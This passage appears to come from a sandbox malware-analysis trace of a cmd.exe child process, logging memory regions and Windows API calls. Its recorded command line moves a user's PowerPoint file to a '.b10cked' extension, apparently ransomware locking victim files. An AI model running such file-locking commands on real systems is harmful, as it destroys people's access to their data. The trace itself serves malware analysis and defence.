"child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35782 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35783 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35784 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35785 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 35786 start_va = 0x4a830000 end_va = 0x4a87bfff entry_point = 0x4a830000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35787 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35788 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35789 start_va = 0x7ffb0000 
end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35790 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35791 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35802 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35803 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35804 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35805 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 35806 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 35807 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35808 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35809 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35810 start_va = 0x76910000 end_va = 0x769e3fff 
entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35811 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35812 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35813 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35814 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35815 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35816 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 35817 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35818 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35819 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: 
id = 35820 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 35821 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 35822 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 35823 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 35824 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 35825 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 891 os_tid = 0xbc8 [0236.669] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfa9c | out: lpSystemTimeAsFileTime=0x2cfa9c*(dwLowDateTime=0xc0871560, dwHighDateTime=0x1d440a9)) [0236.669] GetCurrentProcessId () returned 0xbf8 [0236.669] GetCurrentThreadId () returned 0xbc8 [0236.669] GetTickCount () returned 0x40efd [0236.669] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfa94 | out: lpPerformanceCount=0x2cfa94*=29345846714) returned 1 [0236.670] GetModuleHandleA (lpModuleName=0x0) returned 0x4a830000 [0236.670] __set_app_type (_Type=0x1) [0236.670] __p__fmode () returned 0x76b331f4 [0236.670] __p__commode () returned 0x76b331fc [0236.670] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8521a6) returned 0x0 [0236.670] __getmainargs (in: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c, _DoWildCard=0, _StartInfo=0x4a854140 | out: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c) returned 0 [0236.670] GetCurrentThreadId () returned 0xbc8 [0236.670] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbc8) returned 
0x38 [0236.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.670] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0236.670] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.670] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0236.670] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa2c | out: phkResult=0x2cfa2c*=0x0) returned 0x2 [0236.671] VirtualQuery (in: lpAddress=0x2cfa63, lpBuffer=0x2cf9fc, dwLength=0x1c | out: lpBuffer=0x2cf9fc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.671] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf9fc, dwLength=0x1c | out: lpBuffer=0x2cf9fc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0236.671] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf9fc, dwLength=0x1c | out: lpBuffer=0x2cf9fc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0236.671] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf9fc, dwLength=0x1c | out: lpBuffer=0x2cf9fc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.671] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf9fc, dwLength=0x1c | out: lpBuffer=0x2cf9fc*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0236.671] GetConsoleOutputCP () returned 0x1b5 [0236.671] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 
[0236.671] SetConsoleCtrlHandler (HandlerRoutine=0x4a84e72a, Add=1) returned 1 [0236.671] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.671] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0236.671] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.671] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0236.671] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.671] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.671] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.671] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0236.672] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.672] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0236.672] GetEnvironmentStringsW () returned 0xe0150* [0236.672] FreeEnvironmentStringsW (penv=0xe0150) returned 1 [0236.672] GetEnvironmentStringsW () returned 0xe0150* [0236.672] FreeEnvironmentStringsW (penv=0xe0150) returned 1 [0236.672] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce99c | out: phkResult=0x2ce99c*=0x40) returned 0x0 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x78, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x1, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x1, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.672] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x0, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x40, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x40, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.672] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x40, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.672] RegCloseKey (hKey=0x40) returned 0x0 [0236.673] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce99c | out: phkResult=0x2ce99c*=0x40) returned 0x0 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x40, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x1, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x1, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9a4, 
lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x0, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x9, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x4, lpData=0x2ce9a8*=0x9, lpcbData=0x2ce9a0*=0x4) returned 0x0 [0236.673] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9a4, lpData=0x2ce9a8, lpcbData=0x2ce9a0*=0x1000 | out: lpType=0x2ce9a4*=0x0, lpData=0x2ce9a8*=0x9, lpcbData=0x2ce9a0*=0x1000) returned 0x2 [0236.673] RegCloseKey (hKey=0x40) returned 0x0 [0236.673] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c4 [0236.673] srand (_Seed=0x5b8863c4) [0236.673] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked\"" [0236.673] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked\"" [0236.673] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.673] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe18b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0236.673] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.673] GetEnvironmentVariableW (in: lpName="PATHEXT", 
lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.674] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.674] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0236.674] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0236.674] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0236.674] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0236.674] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0236.674] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0236.674] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0236.674] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0236.674] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0236.674] GetEnvironmentStringsW () returned 0xe22a0* [0236.674] FreeEnvironmentStringsW (penv=0xe22a0) returned 1 [0236.674] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.674] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.674] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0236.674] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0236.674] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0236.674] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0236.674] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0236.674] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0236.674] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0236.674] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0236.674] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf768 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") 
returned 0x18 [0236.674] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf768, lpFilePart=0x2cf764 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf764*="Desktop") returned 0x18 [0236.674] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.674] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf4e4 | out: lpFindFileData=0x2cf4e4) returned 0xdffe0 [0236.675] FindClose (in: hFindFile=0xdffe0 | out: hFindFile=0xdffe0) returned 1 [0236.675] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf4e4 | out: lpFindFileData=0x2cf4e4) returned 0xdffe0 [0236.675] FindClose (in: hFindFile=0xdffe0 | out: hFindFile=0xdffe0) returned 1 [0236.675] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf4e4 | out: lpFindFileData=0x2cf4e4) returned 0xdffe0 [0236.675] FindClose (in: hFindFile=0xdffe0 | out: hFindFile=0xdffe0) returned 1 [0236.675] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0236.675] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0236.675] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0236.675] GetEnvironmentStringsW () returned 0xe2ac0* [0236.675] FreeEnvironmentStringsW (penv=0xe2ac0) returned 1 [0236.675] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.676] GetConsoleOutputCP () returned 0x1b5 [0236.676] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0236.676] GetUserDefaultLCID () returned 0x409 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a854950, cchData=8 | out: lpLCData=":") returned 2 [0236.676] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x23, lpLCData=0x2cf8a8, cchData=128 | out: lpLCData="0") returned 2 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf8a8, cchData=128 | out: lpLCData="0") returned 2 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf8a8, cchData=128 | out: lpLCData="1") returned 2 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a854940, cchData=8 | out: lpLCData="/") returned 2 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a854d80, cchData=32 | out: lpLCData="Mon") returned 4 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a854d40, cchData=32 | out: lpLCData="Tue") returned 4 [0236.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a854d00, cchData=32 | out: lpLCData="Wed") returned 4 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a854cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a854c80, cchData=32 | out: lpLCData="Fri") returned 4 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a854c40, cchData=32 | out: lpLCData="Sat") returned 4 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a854c00, cchData=32 | out: lpLCData="Sun") returned 4 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a854930, cchData=8 | out: lpLCData=".") returned 2 [0236.677] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a854920, cchData=8 | out: lpLCData=",") returned 2 [0236.677] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0236.678] GetConsoleTitleW (in: lpConsoleTitle=0xd08c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.678] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.678] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0236.678] GetProcAddress 
(hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0236.678] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0236.679] _wcsicmp (_String1="move", _String2=")") returned 68 [0236.679] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0236.679] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0236.679] _wcsicmp (_String1="IF", _String2="move") returned -4 [0236.679] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0236.679] _wcsicmp (_String1="REM", _String2="move") returned 5 [0236.679] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0236.681] GetConsoleTitleW (in: lpConsoleTitle=0x2cf5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.681] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0236.681] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0236.681] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0236.681] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0236.681] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0236.681] _wcsicmp (_String1="move", _String2="CD") returned 10 [0236.681] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0236.681] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0236.681] _wcsicmp (_String1="move", _String2="REN") returned -5 [0236.681] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0236.681] _wcsicmp (_String1="move", _String2="SET") returned -6 [0236.681] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0236.681] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0236.681] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0236.681] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0236.681] _wcsicmp (_String1="move", _String2="MD") returned 11 [0236.682] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0236.682] _wcsicmp (_String1="move", _String2="RD") returned -5 [0236.682] _wcsicmp 
(_String1="move", _String2="RMDIR") returned -5 [0236.682] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0236.682] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0236.682] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0236.682] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0236.682] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0236.682] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0236.682] _wcsicmp (_String1="move", _String2="VER") returned -9 [0236.682] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0236.682] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0236.682] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0236.682] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0236.682] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0236.682] _wcsicmp (_String1="move", _String2="START") returned -6 [0236.682] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0236.682] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0236.682] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0236.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0236.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0236.683] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf35c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf354, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf354*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", 
